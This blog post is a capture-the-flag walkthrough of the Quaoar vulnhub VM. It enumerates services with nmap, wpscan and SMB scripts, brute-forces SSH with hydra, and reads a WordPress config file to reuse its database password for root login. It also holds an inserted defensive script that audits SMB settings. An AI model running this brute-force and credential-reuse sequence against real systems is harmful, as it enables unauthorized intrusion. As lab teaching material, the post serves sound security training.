For anyone interested in penetration testing and IT security, there comes a point where you need to test the theoretical skills you have acquired. To give interested people a way to do so without violating the law, Capture-the-Flag (CTF) images exist. A CTF challenge is (usually) a virtual machine deliberately crafted with security vulnerabilities. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we’re using the Quaoar VM from vulnhub.
To get this VM, either to tag along while reading or if you want to solve it by yourself, download it and import it into VirtualBox. A word of advice: never put a downloaded VM directly onto your network. Use a host-only network to reach the virtual machine from your host machine.
But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.
The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.
$ netdiscover -i vboxnet0
192.168.99.101
As we’ll need that IP address a few times, I’ll export it to save myself some typing.
$ export IP=192.168.99.101
Now we can use $IP instead of typing it out all the time.
Enumeration
To get a general overview of the target machine, the ports are enumerated with
$ nmap -A $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET
Nmap scan report for 192.168.99.101
Host is up (0.0020s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
[...]
53/tcp open domain ISC BIND 9.8.1-P1
[...]
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
[...]
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-11-06T16:51:39-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
So we got to know quite a lot about the system. We have open ports for ssh, http, smb and pop3 – among others. We also know there is an Apache webserver running on port 80 and, according to the robots.txt, there is a WordPress installation.
WordPress
Let’s see what wpscan tells us about that WordPress instance:
$ wpscan --url $IP
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.99.101/wordpress/
[+] Started: Mon Nov 6 21:55:33 2017
[!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/
[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 20 vulnerabilities identified from the version number
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
[...]
[i] Fixed in: 3.9.15
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
[...]
[i] Fixed in: 3.9.15
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
[...]
[i] Fixed in: 3.9.15
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
[...]
[i] Fixed in: 3.9.15
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
[...]
[i] Fixed in: 3.9.15
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
[...]
[i] Fixed in: 3.9.16
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
[...]
[i] Fixed in: 3.9.17
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
[...]
[i] Fixed in: 3.9.17
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
[...]
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
Reference: https://wpvulndb.com/vulnerabilities/8815
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
Reference: https://wpvulndb.com/vulnerabilities/8816
Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
Reference: https://wpvulndb.com/vulnerabilities/8817
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
Reference: https://wpvulndb.com/vulnerabilities/8818
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
Reference: https://wpvulndb.com/vulnerabilities/8819
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
Reference: https://wpvulndb.com/vulnerabilities/8820
[...]
[i] Fixed in: 3.9.19
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8905
[...]
[i] Fixed in: 3.9.20
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
Reference: https://wpvulndb.com/vulnerabilities/8906
[...]
[i] Fixed in: 4.7.5
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8910
[...]
[i] Fixed in: 3.9.20
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
Reference: https://wpvulndb.com/vulnerabilities/8911
[...]
[i] Fixed in: 3.9.20
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
Reference: https://wpvulndb.com/vulnerabilities/8941
[...]
[i] Fixed in: 3.9.21
[+] WordPress theme in use: twentyfourteen - v1.1
[+] Name: twentyfourteen - v1.1
| Last updated: 2017-06-08T00:00:00.000Z
| Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css
| Referenced style.css: wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: http://wordpress.org/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Finished: Mon Nov 6 21:55:37 2017
[+] Requests Done: 49
[+] Memory used: 32.5 MB
[+] Elapsed time: 00:00:03
Ok, that’s quite a lot of information to process. But before focussing too much on WordPress, we’ll stick to enumeration for now. Let’s take a look at the Samba shares.
Samba
Enumerate the users first. Luckily, there’s an nmap script for that:
$ nmap --script smb-enum-users.nse -p 445 $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET
Nmap scan report for 192.168.99.101
Host is up (0.00089s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-users:
| QUAOAR\nobody (RID: 501)
| Full name: nobody
| Description:
| Flags: Normal user account
| QUAOAR\root (RID: 1001)
| Full name: root
| Description:
| Flags: Normal user account
| QUAOAR\viper (RID: 1000)
| Full name: viper
| Description:
| Flags: Normal user account
| QUAOAR\wpadmin (RID: 1002)
| Full name:
| Description:
|_ Flags: Normal user account
Ok. So we see some usernames: nobody, root, viper and wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:
$ nmap --script smb-enum-shares.nse -p 445 $IP
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET
Nmap scan report for 192.168.99.101
Host is up (0.00067s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\192.168.99.101\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Quaoar server (Samba, Ubuntu))
| Users: 1
| Max Users:
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.99.101\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users:
| Path: C:\var\lib\samba\printers
| Anonymous access:
|_ Current user access:
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
This looks like we’re on to something here: a guest share with read/write access! Let’s try to connect to that share.
$ smbclient //$IP/IPC$ -N
The prompt changes. Looks like we’re in!
smb: \>
Unfortunately, we can’t do anything here:
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
Let’s leave that trail for now. We have gathered quite a lot of information already and can try to gain access with it.
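The two nmap scripts above expose the settings an administrator should have fixed before this box went live: a guest session is accepted, SMB message signing is disabled and IPC$ is anonymously writable. The following is an added example (not part of the original post) that parses nmap's smb-security-mode and smb-enum-shares output and lists each risky setting with the smb.conf change that addresses it; the sample text is constructed to match the output quoted above, and the suggested fixes are my own assumptions, not something the post states.

```python
import re

# Constructed sample shaped like the nmap host-script output quoted above
# (smb-security-mode from the first scan, smb-enum-shares from the second).
SAMPLE = r"""
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-enum-shares:
|   account_used: guest
|   \\192.168.99.101\IPC$:
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.99.101\print$:
|     Anonymous access:
|_    Current user access:
"""

# smb.conf settings that address each finding (assumed remediation, not from the post)
FIXES = {
    "guest_session": "map to guest = Never, restrict anonymous = 2",
    "message_signing": "server signing = mandatory",
    "anonymous_write": "drop 'guest ok' / 'writable' from the share definition",
}

def audit_smb(text):
    """Return (finding, subject, fix) triples for risky settings in nmap's SMB output."""
    findings = []
    share = None
    for raw in text.splitlines():
        line = re.sub(r"^\|_?\s*", "", raw)   # drop nmap's "| " / "|_ " prefix and indent
        header = re.match(r"(\\\\[^:]+):$", line)
        if header:                            # a "\\host\share:" block begins
            share = header.group(1)
            continue
        if line.startswith("account_used: guest"):
            f = ("guest_session", "null/guest session accepted", FIXES["guest_session"])
        elif line.startswith("message_signing:") and "disabled" in line:
            f = ("message_signing", line, FIXES["message_signing"])
        elif share and line.startswith("Anonymous access:") and "WRITE" in line:
            f = ("anonymous_write", share, FIXES["anonymous_write"])
        else:
            continue
        if f not in findings:                 # account_used is listed by both scripts
            findings.append(f)
    return findings
```

Feeding the real `nmap --script smb-security-mode,smb-enum-shares` output of a host into `audit_smb` gives a short checklist for the Samba hardening review.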
Attack
With everything we discovered so far, we’re ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. info.txt is the file where I saved everything that looked like a user account or a possible password during enumeration.
$ hydra -L info.txt -P info.txt -u $IP ssh -t 4
[22][ssh] host: 192.168.99.101 login: wpadmin password: wpadmin
Ok, we got our entry point!
$ ssh wpadmin@$IP
Let’s check if we have any interesting groups assigned.
$ id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)
Nothing. But we have our first flag.
$ ls
flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e
It’s safe to assume the user wpadmin has at least read rights for the WordPress installation. Let’s check it out and see if we get some more information!
$ cd /var/www/wordpress
$ cat wp-config.php | grep DB_
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
Another password, great! Let’s see if this is the real root password for this box:
$ ssh root@$IP
root@192.168.99.101's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Mon Nov 6 18:40:50 EST 2017
System load: 0.47 Processes: 95
Usage of /: 29.9% of 7.21GB Users logged in: 0
Memory usage: 32% IP address for eth0: 192.168.99.101
Swap usage: 0% IP address for virbr0: 192.168.122.1
Graph this data and manage this system at https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
OK, let’s see.
root@Quaoar:~# ls
flag.txt vmware-tools-distrib
Now we have the second flag.
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb
Learnings
We got it. Time to take a step back and look at what we learned during the penetration test of this VM:
- Enumeration is key. There’s a lot of information hidden in plain sight.
- If you’re running any sort of service, don’t reuse passwords.
- Disable everything you do not need on your systems.
Blog author
Martin Riedel